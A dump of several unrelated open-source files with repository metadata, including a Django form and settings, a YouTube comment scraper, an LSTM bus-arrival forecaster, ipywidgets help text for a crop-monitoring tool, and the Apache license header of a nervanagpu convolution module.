if(not (ov == value)):
self._writeset(key,value)
self.rdb[key]=value
def __delitem__(self,key):
self._writedel(key)
del self.rdb[key]
def __contains__(self,key):
return key in self.rdb
def keys(self):
return self.rdb.keys()
def __iter__(self):
return self.rdb.__iter__()
def __len__(self):
return len(self.rdb)
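# Minimal usage sketch (hedged -- Python 2 era module; the file name is hypothetical).
# Keys are tuples and values must be JSON-serializable; every mutation is appended to
# the replay log, so the mapping survives restarts:
# db = ReplayDB('state.replay')
# db[('user', 42)] = {'score': 10}   # logged as an 's' (set) record
# del db[('user', 42)]               # logged as a 'd' (delete) record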
|
[
"steve@soapforge.com"
] |
steve@soapforge.com
|
a5330d19026db986f20c8b01217e15b07e32f511
|
4066083132057c6948dadfa534412454becd25b3
|
/students/form.py
|
22acd047397420e6d4849556174764753944456d
|
[] |
no_license
|
lanchaoxiang/django-
|
22d82721caeec9fbd02520c417dd3a4c1668704d
|
db7144451e6ba9fdef5c3d16e912617591c43ba6
|
refs/heads/master
| 2022-06-17T19:57:11.513424
| 2020-05-15T07:21:42
| 2020-05-15T07:21:42
| 264,125,897
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 400
|
py
|
from django import forms
from .models import Students
class StudentsForm(forms.ModelForm):
def clean_phone(self):
cleaned_data = self.cleaned_data['phone']
if not cleaned_data.isdigit():
            raise forms.ValidationError("Must be digits")
return int(cleaned_data)
class Meta:
model = Students
        fields = ('name', 'sex', 'profession', 'phone', 'email')
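# Hedged usage sketch (field values are made up; field names follow the Meta above):
# form = StudentsForm(data={'name': 'Li Lei', 'sex': 1, 'profession': 'CS',
#                           'phone': '13800138000', 'email': 'li@example.com'})
# form.is_valid()  # True only if clean_phone() sees an all-digit phone value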
|
[
"982252331.com"
] |
982252331.com
|
d584ad747c5fa2dd62dabd8f0807dcc050ba430c
|
f397eb9e1c05ab26d412d95569986b1b73ed2eb5
|
/Python/youtube_services.py
|
f49e61cd332ac625ce170fcbe77ebbbe5526d153
|
[] |
no_license
|
Bror-E/Eurovision-Youtube-Comments
|
b6539d2646c30b6a9f395d301e3d25b1e5558486
|
2441b50e036e86c5bc28a00e12174f349e48a644
|
refs/heads/main
| 2023-05-02T06:15:14.995229
| 2021-05-24T11:45:10
| 2021-05-24T11:45:10
| 368,993,290
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,167
|
py
|
import requests
import json
from csv import writer
from googleapiclient.discovery import build
from urllib.parse import urlparse, parse_qs
import os
import codecs
test_url = "https://www.youtube.com/watch?v=i6r3MMMAo3Q"
API_KEY_FILENAME = "youtubeDataV3.txt"
def get_api_key(filename):
with open(filename) as f:
        key = f.readline().strip()  # strip the trailing newline so the key is usable
return key
def build_youtube_data_v3_service(apiKeyFilename):
key = get_api_key(apiKeyFilename)
return build("youtube", "v3", developerKey=key)
def get_video_id_from_url(url):
u_pars = urlparse(url)
quer_v = parse_qs(u_pars.query).get("v")
if quer_v:
return quer_v[0]
pth = u_pars.path.split("/")
if pth:
return pth[-1]
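# Hedged examples of the two URL shapes handled above:
# get_video_id_from_url("https://www.youtube.com/watch?v=i6r3MMMAo3Q")  # -> "i6r3MMMAo3Q"
# get_video_id_from_url("https://youtu.be/i6r3MMMAo3Q")                 # -> "i6r3MMMAo3Q"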
def get_comments(part="snippet",
maxResults=100,
textFormat="plainText",
order="time",
videoId='',
csv_filename="empty",
csv_path=''):
comments = []
service = build_youtube_data_v3_service(API_KEY_FILENAME)
response = service.commentThreads().list(
part=part,
maxResults=maxResults,
textFormat=textFormat,
order=order,
videoId=videoId
).execute()
counter = 0
while response: # this loop will continue to run until you max out your quota
print(f'Getting comments {counter} -> {counter+maxResults}')
for item in response["items"]:
comment = item["snippet"]["topLevelComment"]["snippet"]["textDisplay"].rstrip(
'\n')
comments.append(comment)
with codecs.open(os.path.join(csv_path, csv_filename), "a+", encoding="utf-16") as f:
csv_writer = writer(f)
csv_writer.writerow([comment])
if "nextPageToken" in response:
response = service.commentThreads().list(
part=part,
maxResults=maxResults,
textFormat=textFormat,
order=order,
videoId=videoId,
pageToken=response["nextPageToken"]
).execute()
else:
break
        counter += maxResults
    return comments  # hand back the accumulated comments once all pages have been fetched
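# Hedged usage sketch (uses the test_url defined above; the CSV names are examples):
# vid = get_video_id_from_url(test_url)  # -> "i6r3MMMAo3Q"
# get_comments(videoId=vid, csv_filename="comments.csv", csv_path=".")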
|
[
"bror_ebk@hotmail.com"
] |
bror_ebk@hotmail.com
|
e2d72a4b50f635ef0ad2b739407c127437f87cc8
|
926ffe00858129292bcb90a5d4257ce65ba843a0
|
/src/ipycbm/plugins/foi/foi_help.py
|
f00f66813b04f934b6b0813a40351b94837d4d46
|
[
"BSD-3-Clause"
] |
permissive
|
VP-GEO/cbm
|
c07386b1204b0cd2a92b06abb4b9c2dc10057790
|
4ed229f6b6455435b6d032deb8a39dba4ecee7a2
|
refs/heads/main
| 2023-02-25T19:33:34.147762
| 2021-01-27T13:43:11
| 2021-01-27T13:43:11
| 331,580,086
| 0
| 0
|
BSD-3-Clause
| 2021-01-21T09:37:53
| 2021-01-21T09:37:52
| null |
UTF-8
|
Python
| false
| false
| 10,830
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This file is part of CbM (https://github.com/ec-jrc/cbm).
# Author : Gilbert Voican, Konstantinos Anastasakis
# Credits : GTCAP Team
# Copyright : 2021 European Commission, Joint Research Centre
# License : 3-Clause BSD
from ipywidgets import (HTML, HBox, VBox, Checkbox, Layout, widgets)
def widget_box():
wbox = VBox(children=[ipycbm_help(), about()])
return wbox
def ipycbm_help():
html = """
<H2>'Get' and 'View' functions.</H2>
With the 'get' function you can download data from the server to your local jupyter environment.<br>
The 'view' function loads local files and displays them with different methods, or provides example code for each selected dataset.<br>
<H4>Available options:</H4>
<b>Get data example:</b><br>
<code>import src.ipycbm</code><br>
<code>ipycbm.get()</code>
<br>
<b>View data example:</b><br>
<code>import src.ipycbm</code><br>
<code>ipycbm.view()</code><br>
<br>
'**tmp**' folder structure example for parcel with ID 12345:<br>
<code>tmp/
cat2019/parcel_12345/12345_information.json
cat2019/parcel_12345/12345_time_series.csv
cat2019/parcel_12345/12345_chipimages/12345_images_list.csv
cat2019/parcel_12345/12345_chipimages/S2A_MSIL2A_2019---.B04.tif
cat2019/parcel_12345/12345_chipimages/...</code>
"""
wbox = widgets.HTML(
value=html,
placeholder="Documantation",
description="")
return wbox
def about():
from src import __version__
html = f"""
<H1>About</H1>
<H3>JRC D5 Food security - GTCAP</H3>
<H4>DIAS for CAP Checks by Monitoring, development platforms and services.</H4>
Authors:<br>
Guido Lemoine<br>
Konstantinos Anastasakis<br>
<br>
Copyright 2021, Joint Research Centre (JRC) European Commission<br>
License: 3-Clause BSD , Version: {__version__}
"""
wbox = HTML(
value=html,
placeholder='About',
description='',
)
return wbox
def widget_box_foi():
wbox = VBox(children=[ipycbm_help_foi(), about()])
return wbox
def ipycbm_help_foi():
html = """
<H2>FOI Assessment: Heterogeneity and Cardinality</H2>
The FOI assessment notebook is based on the principle that inside a homogeneous FOI there should be only one type of pixels. By the same idea, an FOI which respects the 1-1 cardinality should not include clusters of pixels larger than a specified threshold (we can consider dispersed pixels different from the main class as “noise”).<br>
The FOI Assessment performs a spatial analysis on a "thematic raster" produced in advance. The thematic raster can be the result of any image/raster processing method yielding a class label for each pixel - crop classification, behavior analysis of land phenomena, gridded data on soil, slope, humidity, etc.<br>
As an example, if the thematic raster is the result of a crop classification, a homogeneous FOI should have only one type of pixels, representing the respective crop; a cardinal FOI should not include any cluster of pixels from another class larger than a specified threshold.
If the thematic raster is the result of a behavior analysis, all the pixels inside an FOI should behave in the same way during a period of time.<br>
For both heterogeneity and cardinality, the notebook provides two methods for the analysis: one based on area calculation (version 1) and one based on cluster size calculation (version 2). Both methods give similar results.
<br>
<H2>Version 1</H2>
The first version requires a connection to a database server (PostgreSQL with the PostGIS extension).<br>
For the heterogeneity analysis the following steps are required (the steps correspond to the numbering on the interface):<br>
1. Connect to the database (at the moment only „Database connection settings” are required)<br>
a) Upload the reference data shapefile to the server. A graphical interface is provided for the upload.<br>
b) Import the uploaded shapefile into the database, specifying the name of the table that will be created in the database.<br>
2. Upload the „thematic” raster image. A graphical interface is provided. The accepted files are tif or tiff files. The thematic raster should be a one-band raster file, with the pixel values representing the classes (like crop type or type of behaviour).<br>
3. Prepare FOI procedure – allows the user to create the database functions on the database server. This step creates the necessary functions and stored procedures.<br>
4. Select the required files for analysis:<br>
a) Vector file: the data on which the analysis will be applied. If several shapefiles have been uploaded to the server, this option allows selecting the one to analyze.<br>
b) Thematic raster: the thematic raster provided. If several rasters have been uploaded to the server, this option allows selecting the one to use in the analysis.<br>
c) YAML file that holds the classes from the thematic raster file: this file specifies the classes of pixels from the thematic raster and can also provide the meaning of those classes. It should have the following structure:<br>
<code>example.yml</code><br>
<code>category_map:
0: Unclassified
1: Class1
2: Class2
3: Class3
4: Class4
5: Class5
6: Class6
7: Class7
8: Class8
9: Class9
10: Class10</code><br>
Class1, Class2 can be replaced by the meaning of the class (like Wheat, Maize, etc., a behavior name, or any other label ….).<br>
The YAML file should include all the classes that exist in the thematic raster. A graphical interface is provided for the upload.<br>
5. Analysis parameters:<br>
Heterogeneity thresholds: in order to exclude the influence of „noise” pixels, the user can specify the heterogeneity thresholds (for example, only the FOIs where one class of pixels has a percentage between 30 and 70 are considered heterogeneous).<br>
Minimum area for cluster selection: the user can specify, in square meters, the minimum area of a cluster that is considered a cardinality issue. For example, clusters smaller than 2000 square meters can be considered as not influencing the FOI cardinality.<br>
6. Run FOI procedure.<br>
Starts the FOI analysis. The result of the analysis is represented by three shapefiles that are stored in the “output_data” folder (/cbm/tmp/foi/output_data).<br>
<b>name of the shapefile dataset (without extension) that needs to be tested + foih_v1.shp</b> – represents the initial shapefile and during the analysis the following attributes are added:<br>
• foi_h – heterogeneity flag (0 for homogeneous FOIs and 1 for heterogeneous FOIs)<br>
• number of pixels for each class (the name of the attribute is the name of the class)<br>
• total number of pixels for the respective FOI<br>
• percentage of pixels from each class (number of pixels for each class / total number of pixels inside the FOI)<br>
<b>name of the shapefile dataset (without extension) that needs to be tested + foic_v1.shp</b> - represents the initial shapefile and during the analysis the following attributes are added:<br>
• foi_c – cardinality flag (0 for FOIs respecting the 1-1 cardinality and 1 for FOIs not respecting the 1-1 cardinality). As a result of this analysis, the FOIs that include more than one cluster of pixels from different classes bigger than the threshold are considered non-cardinal. For example, an FOI that includes two clusters of pixels from different classes (one arable land and one non-agricultural area), each cluster bigger than the threshold (e.g. 2000 square meters), is considered as not respecting the 1-1 cardinality.<br>
<b>name of the shapefile dataset (without extension) that needs to be tested + foic_clusters_v1.shp</b> – represents only the clusters of pixels that determine the FOI cardinality (for example, if an FOI includes three clusters of pixels bigger than the threshold, only those clusters will be saved in this shapefile)<br>
<H2>Version 2</H2>
The second version does not require a database server. All the calculations are made at pixel level using Python function.<br>
The interface and the steps are similar to the ones from Version 1. The main difference is that it does not include the functionality for connecting to a database or creating the functions on the database server.<br>
The available options are:<br>
Connectivity type: 8 or 4 connected pixels (4 indicating that diagonal pixels are not considered directly adjacent for polygon membership purposes or 8 indicating they are)<br>
Negative buffer: the user can apply a negative buffer to the FOI in order to reduce the influence of boundary effects on the analysis (roads, adjacent FOIs, etc.)<br>
Cluster size (in pixels): the minimum number of pixels for which a cluster is taken into account.<br>
The result of the analysis is represented by two shapefiles that are stored in the “output_data” folder (/cbm/tmp/foi/output_data).<br>
<b>name of the shapefile dataset (without extension) that needs to be tested + foih_v2.shp</b> – represents the initial shapefile and during the analysis the following attributes are added:<br>
• foi_h – heterogeneity flag (0 for homogeneous FOIs and 1 for heterogeneous FOIs)<br>
• number of pixels for each class (the name of the attribute is the name of the class)<br>
• total number of pixels for the respective FOI<br>
• percentage of pixels from each class (number of pixels for each class / total number of pixels inside the FOI)<br>
<b>name of the shapefile dataset (without extension) that needs to be tested + foic_v2.shp</b> - represents the initial shapefile and during the analysis the following attributes are added:<br>
• foi_c – cardinality flag (0 for FOIs respecting the 1-1 cardinality and 1 for FOIs not respecting the 1-1 cardinality). As a result of this analysis, the FOIs that include more than one cluster of pixels from different classes bigger than the threshold are considered as not respecting the 1-1 cardinality. For example, an FOI that includes two clusters of pixels from different classes (one arable land and one non-agricultural area), each cluster bigger than the threshold (e.g. 20 pixels), is considered as not respecting the 1-1 cardinality.<br>
• Clusters – the information about the clusters of pixels identified inside the FOI, as pairs of (pixel class, cluster size): for example (3, 25), (5, 120) means that two clusters were identified inside the FOI: one of pixels from class 3 with a cluster size of 25 pixels, and one of pixels from class 5 with a cluster size of 120 pixels.<br>
Author:<br>
Gilbert Voican
"""
wbox = widgets.HTML(
value=html,
placeholder="Documentation",
description="")
return wbox
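# Hedged usage sketch (inside a Jupyter notebook with ipywidgets available):
# from IPython.display import display
# display(widget_box())       # 'Get'/'View' help plus the About panel
# display(widget_box_foi())   # FOI assessment help plus the About panel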
|
[
"Konstantinos.ANASTASAKIS@ext.ec.europa.eu"
] |
Konstantinos.ANASTASAKIS@ext.ec.europa.eu
|
4c75fb886c4b239e33e380d908655600d93ee545
|
29c38a4d4151e91ceedf96995ef6bc42e7aa8229
|
/lstm_bus_prediction.py
|
32f27addcff416cc0c636ce89ade844dcc00a0e5
|
[] |
no_license
|
NeuEIRG/OTL-
|
bbb4a9b92c71d17a04453cfe49a0fc9f841fc55e
|
63b01e088396f02dab30ce89cd4f3a47234355f3
|
refs/heads/master
| 2020-04-23T11:02:32.536059
| 2019-03-11T17:24:39
| 2019-03-11T17:24:39
| 171,122,551
| 10
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,306
|
py
|
from math import ceil
from math import floor
from math import sqrt
from numpy import split
from numpy import array
from pandas import read_csv
from sklearn.metrics import mean_squared_error
from matplotlib import pyplot
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import Flatten
from keras.layers import LSTM
# split a univariate dataset into train/test sets
# Training-set split: divide the univariate dataset into a training set and a test set
# One point worth noting: the LSTM is trained with a step of one day, while prediction uses a step
# of one week, which is why the dataset has to be split by weeks
# For the bus data, 30 historical observations are used to predict the current arrival time
# 6698
def split_dataset(data):
    # take the first three years of data as the training set and the last year as the test set
train, test = data[0:4900], data[4900:6300]
print(len(data))
print(len(train))
print(len(test))
    # restructure the training data into week-sized chunks
    # numpy's split function cuts an array into equal pieces from left to right; the number of
    # pieces must evenly divide the array's length; axis defaults to 0, i.e. row-wise splitting
train = array(split(train, len(train)/7))
test = array(split(test, len(test)/7))
return train, test
def max_min(data):
data=data.values
Max=max(data)
Min=min(data)
temp=[0]*len(data)
for i in range(len(data)):
temp[i]=(data[i]-Min)/(Max-Min)
return temp
def standardization(data):
for i in range(len(data)):
columns=data[i].columns
for col in columns:
data[i][col]=max_min(data[i][col])
def new_split_dataset(data):
for i in range(len(data)):
pass
# evaluate one or more weekly forecasts against expected values
# evaluates single-week or multi-week forecasts against the expected values
def evaluate_forecasts(actual, predicted):
    # parameters: actual holds the observed values, predicted holds the forecast values
scores = list()
# calculate an RMSE score for each day
    # i.e. compute an RMSE (root mean squared error) score for each day across all weeks
for i in range(actual.shape[1]):
        # compute the mean squared error
mse = mean_squared_error(actual[:, i], predicted[:, i])
        # take the square root to get the RMSE
rmse = sqrt(mse)
        # store it in the scores list
scores.append(rmse)
    # compute the overall RMSE across all days and weeks
s = 0
for row in range(actual.shape[0]):
for col in range(actual.shape[1]):
s += (actual[row, col] - predicted[row, col])**2
score = sqrt(s / (actual.shape[0] * actual.shape[1]))
return score, scores
# summarize the overall and per-day scores
def summarize_scores(name, score, scores):
    # join (a Python built-in) turns a list into a string; the comma in quotes is the separator
s_scores = ', '.join(['%.1f' % s for s in scores])
print('%s: [%.3f] %s' % (name, score, s_scores))
# convert history into inputs and outputs
def to_supervised(train, n_input, n_out=1):
    # parameters: n_input is the sliding-window size; n_out is the number of future steps to predict
    # (a value of 7 would mean predicting the next 7 days, i.e. one week; the default here is 1)
    # flatten data
data = train.reshape((train.shape[0]*train.shape[1], train.shape[2]))
print('data shape',data.shape)
X, y = list(), list()
in_start = 0
# step over the entire history one time step at a time
for _ in range(len(data)):
# define the end of the input sequence
        in_end = in_start + n_input  # end index of the input window (window size: in_end - in_start = n_input)
        out_end = in_end + n_out  # end index of the output window (window size: out_end - in_end = n_out)
        # ensure we have enough data for this instance: the output window must not run past the end of the dataset
if out_end < len(data):
            # x_input = data[in_start:in_end, 0]  # for single-feature prediction only one feature is taken; x_input looks like [1, 2, ..., 8]
            # # the reshape below turns x_input into 2-D form, i.e. [[1], [2], [3], ..., [8]], to match the Keras model input
            # x_input = x_input.reshape((len(x_input), 1))  # note that len() on a multi-dimensional array returns its outermost dimension
# X.append(x_input)
X.append(data[in_start:in_end, :])
            y.append(data[in_end:out_end, 12])  # the label y does not need to be converted to 2-D form
# move along one time step
in_start += 1
return array(X), array(y)
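# Hedged shape sketch for to_supervised: with flattened data of shape (n_steps, n_features),
# X has shape (samples, n_input, n_features) and y has shape (samples, n_out), the target
# being taken from column index 12.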
# train the model
def build_model(train, n_input):
    # prepare data: convert the time series into a supervised-learning format
train_x, train_y = to_supervised(train, n_input)
print("in build_model")
print("train_x, train_y",train_x.shape, train_y.shape)
    # define parameters
verbose, epochs, batch_size = 0, 70, 16
n_timesteps, n_features, n_outputs = train_x.shape[1], train_x.shape[2], train_y.shape[1]
print('n_timesteps, n_features, n_outputs',train_x.shape[1], train_x.shape[2], train_y.shape[1])
print('input_shape',n_timesteps, n_features)
    # define the model structure
model = Sequential()
model.add(LSTM(200, activation='relu', input_shape=(n_timesteps, n_features)))
model.add(Dense(100, activation='relu'))
model.add(Dense(n_outputs))
model.compile(loss='mse', optimizer='adam')
    # fit the network
model.fit(train_x, train_y, epochs=epochs, batch_size=batch_size, verbose=verbose)
return model
'''
Python does not let the programmer choose between pass-by-value and pass-by-reference.
Python always passes arguments as "references to objects",
which is effectively a blend of the two.
If a function receives a reference to a mutable object (such as a dict or a list),
it can modify the object's original value -- the object is effectively passed by reference.
If a function receives a reference to an immutable object (such as a number, string or tuple),
it cannot modify the original object directly -- the object is effectively passed by value.
'''
# make a forecast
'''
Prediction rule of the forecast function:
n_input is the sliding-window size: each prediction of the next week uses the last n_input weeks
of history, taken from the history collection in evaluate_model. Each step therefore predicts the
nearest upcoming period from the n_input consecutive observations closest to it, fully exploiting
the temporal ordering of the data -- this is what distinguishes time-series models from other
regression models in implementation.
'''
def forecast(model, history, n_input):
    # flatten data
data = array(history)
data = data.reshape((data.shape[0]*data.shape[1], data.shape[2]))
    # retrieve the last observations to use as input data
print('in forecast')
print('data shape',len(data))
input_x = data[-n_input:, :]
    # reshape into [1, n_input, n_features] to match the LSTM model's input format
input_x = input_x.reshape((1, input_x.shape[0], input_x.shape[1]))
    # forecast the next week
print('length of input_x',input_x.shape)
yhat = model.predict(input_x, verbose=0)
    # we only want the vector forecast: model.predict returns a 2-D batch array, so take its first (and only) row
print('yhat',yhat)
print('\n')
yhat = yhat[0]
return yhat
# evaluate a single model
# uses Walk-Forward Validation (the time-series analogue of k-fold cross-validation)
'''
Role and update rule of the history collection in evaluate_model:
history starts out equal to the training set train. Then, in each round of prediction, once the
forecast call for a test sample has finished, that sample is appended to the history collection,
so that in the end history = train + test.
'''
def evaluate_model(train, test, n_input):
# fit model
model = build_model(train, n_input)
# history is a list of weekly data
    # note: we cannot simply write history = train, because assignment in Python only binds a reference; train must be "copied" before being assigned to history
history = [x for x in train]
    # walk-forward validation over each week
predictions = list()
for i in range(len(test)):
        # predict the week: get the forecast for one test sample
yhat_sequence = forecast(model, history, n_input)
        # store the predictions
predictions.append(yhat_sequence)
        # get the real observation and append this test sample to history as input for the next prediction
history.append(test[i, :])
    # evaluate the predictions for each week
predictions = array(predictions)
mse = mean_squared_error(test[:, :, 12], predictions)
score, scores = evaluate_forecasts(test[:, :, 12], predictions)
return score, scores
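# Hedged end-to-end usage sketch (the CSV file name is hypothetical; column 12 is the
# target series, matching to_supervised above; both split lengths must divide by 7):
# dataset = read_csv('bus_data.csv', header=0)
# train, test = split_dataset(dataset.values)
# score, scores = evaluate_model(train, test, n_input=30)
# summarize_scores('lstm', score, scores)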
|
[
"noreply@github.com"
] |
NeuEIRG.noreply@github.com
|
fde240b2585bc39894fa72155c2361f0b3504eba
|
1877498789048c4bbfec56e1cdbea65324b5a344
|
/quiz1.py
|
ae30c75832cb6e895e06b8c87abb6d78b11528da
|
[] |
no_license
|
rqnoble/vectors
|
7034679c44b234a7057178498b4c737268ecee63
|
56ed5bbcd1f8e7e6db6a5a4e486bd46621c85046
|
refs/heads/master
| 2021-01-19T10:39:20.697143
| 2017-02-16T16:21:20
| 2017-02-16T16:21:20
| 82,198,911
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 242
|
py
|
from vector import Vector
v = Vector([8.218,-9.341])
vv = Vector([-1.129,2.111])
print v.plus(vv)
v = Vector([7.119,8.215])
vv = Vector([-8.223,0.878])
print v.minus(vv)
v = Vector([1.671,-1.012,-0.318])
c = 7.41
print v.times_scalar(c)
|
[
"robb.qn@gmail.com"
] |
robb.qn@gmail.com
|
616dec02e3d4a188053dd731b090bf35d28cf7a7
|
7f570caf00f6319167811c4dde73b2aea802fecc
|
/Hackathon/demoPage/migrations/0027_auto_20180505_2143.py
|
e0b4bec2d5212cfa631dcc897cc20c27ac2e373c
|
[] |
no_license
|
pinchien/Healthcare-Hackathon
|
4d44de2b7a556e1da09f10599a45082241a67105
|
c1f9c3874ff95544455fa6a7df783e0d4231e00b
|
refs/heads/master
| 2020-03-16T05:58:24.605494
| 2018-05-07T05:22:24
| 2018-05-07T05:22:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 816
|
py
|
# Generated by Django 2.0.5 on 2018-05-05 21:43
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('demoPage', '0026_auto_20180505_2136'),
]
operations = [
migrations.DeleteModel(
name='PatientData',
),
migrations.AlterField(
model_name='healthdata',
name='inputTime',
field=models.DateTimeField(blank=True, default=datetime.datetime(2018, 5, 5, 21, 43, 23, 565428), null=True),
),
migrations.AlterField(
model_name='registerdata',
name='inputTime',
field=models.DateTimeField(blank=True, default=datetime.datetime(2018, 5, 5, 21, 43, 23, 565428), null=True),
),
]
|
[
"eunice730711@gmail.com"
] |
eunice730711@gmail.com
|
825d1831a90ed786db9ab8760c0b7c7605b2a7f8
|
98a56d8a1914bd871cde7cf7b199dab16c0ff1df
|
/projeto/projeto/settings.py
|
165197ec1a9a76c33a39e26b9f3de5eacc3b2c5c
|
[
"Apache-2.0"
] |
permissive
|
hersonananias/Projeto_Django
|
47455e62455a17546f744d864db5bcae57e5f4e8
|
a9f5f508f73896ce9434c6e56d8d7c3d3e9d6397
|
refs/heads/master
| 2020-05-18T10:23:41.725956
| 2019-05-07T23:26:43
| 2019-05-07T23:26:43
| 184,352,787
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,132
|
py
|
"""
Django settings for projeto project.
Generated by 'django-admin startproject' using Django 2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'mrfduwp03vswx*$t(y(myv4#_@dudkla@waw^xdoj4i@-7(%*c'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'core',
'curriculo',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'projeto.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'projeto.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'pt-br'
TIME_ZONE = 'America/Sao_Paulo'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
|
[
"herson.ananias@aluno.faculdadeimpacta.com.br"
] |
herson.ananias@aluno.faculdadeimpacta.com.br
|
a3394a232daaaf1420a9a1059d76d723d0d91293
|
5479670e391f3e0353504de6af8e7043f3874368
|
/comments/migrations/0002_auto_20170814_0933.py
|
bd3ed6dbf6425d7598162ff2a7b8af095648b7da
|
[] |
no_license
|
seLzzf/web
|
555c43af7ea38c9387fd4515e7d7eaa5785d21f9
|
4535b04f9c2881949b3474038fe255526b91bdef
|
refs/heads/master
| 2021-07-19T17:12:23.166756
| 2017-10-25T15:14:08
| 2017-10-25T15:14:08
| 98,084,178
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 471
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-08-14 09:33
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('comments', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='comment',
name='message',
field=models.TextField(verbose_name='留言'),
),
]
|
[
"l271938333@gmail.com"
] |
l271938333@gmail.com
|
825efdebc5e4ceefb5c6788eaea3243e8d09e2d4
|
fa1ae88e5299fdeba3951564df755b8eca5d4344
|
/nervana_theano/conv.py
|
cd4fab5d92428dfd0e51e3c2efe297ce796ca0c0
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
no_license
|
Libardo1/nervana_theano
|
5cc1e32ea110a79f78544b17eb485d233ce1c178
|
1a31f7ee983ad3dc4cb07c12a5844e41f59abc5a
|
refs/heads/master
| 2021-01-17T12:58:24.047900
| 2015-05-07T20:15:03
| 2015-05-07T20:15:03
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 32,096
|
py
|
"""
This file contains code from nervanagpu, which is covered by the following
license:
Apache License
Version 2.0, January 2004
http://www.apache.org/licenses/
TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
1. Definitions.
"License" shall mean the terms and conditions for use, reproduction,
and distribution as defined by Sections 1 through 9 of this document.
"Licensor" shall mean the copyright owner or entity authorized by
the copyright owner that is granting the License.
"Legal Entity" shall mean the union of the acting entity and all
other entities that control, are controlled by, or are under common
control with that entity. For the purposes of this definition,
"control" means (i) the power, direct or indirect, to cause the
direction or management of such entity, whether by contract or
otherwise, or (ii) ownership of fifty percent (50%) or more of the
outstanding shares, or (iii) beneficial ownership of such entity.
"You" (or "Your") shall mean an individual or Legal Entity
exercising permissions granted by this License.
"Source" form shall mean the preferred form for making modifications,
including but not limited to software source code, documentation
source, and configuration files.
"Object" form shall mean any form resulting from mechanical
transformation or translation of a Source form, including but
not limited to compiled object code, generated documentation,
and conversions to other media types.
"Work" shall mean the work of authorship, whether in Source or
Object form, made available under the License, as indicated by a
copyright notice that is included in or attached to the work
(an example is provided in the Appendix below).
"Derivative Works" shall mean any work, whether in Source or Object
form, that is based on (or derived from) the Work and for which the
editorial revisions, annotations, elaborations, or other modifications
represent, as a whole, an original work of authorship. For the purposes
of this License, Derivative Works shall not include works that remain
separable from, or merely link (or bind by name) to the interfaces of,
the Work and Derivative Works thereof.
"Contribution" shall mean any work of authorship, including
the original version of the Work and any modifications or additions
to that Work or Derivative Works thereof, that is intentionally
submitted to Licensor for inclusion in the Work by the copyright owner
or by an individual or Legal Entity authorized to submit on behalf of
the copyright owner. For the purposes of this definition, "submitted"
means any form of electronic, verbal, or written communication sent
to the Licensor or its representatives, including but not limited to
communication on electronic mailing lists, source code control systems,
and issue tracking systems that are managed by, or on behalf of, the
Licensor for the purpose of discussing and improving the Work, but
excluding communication that is conspicuously marked or otherwise
designated in writing by the copyright owner as "Not a Contribution."
"Contributor" shall mean Licensor and any individual or Legal Entity
on behalf of whom a Contribution has been received by Licensor and
subsequently incorporated within the Work.
2. Grant of Copyright License. Subject to the terms and conditions of
this License, each Contributor hereby grants to You a perpetual,
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
copyright license to reproduce, prepare Derivative Works of,
publicly display, publicly perform, sublicense, and distribute the
Work and such Derivative Works in Source or Object form.
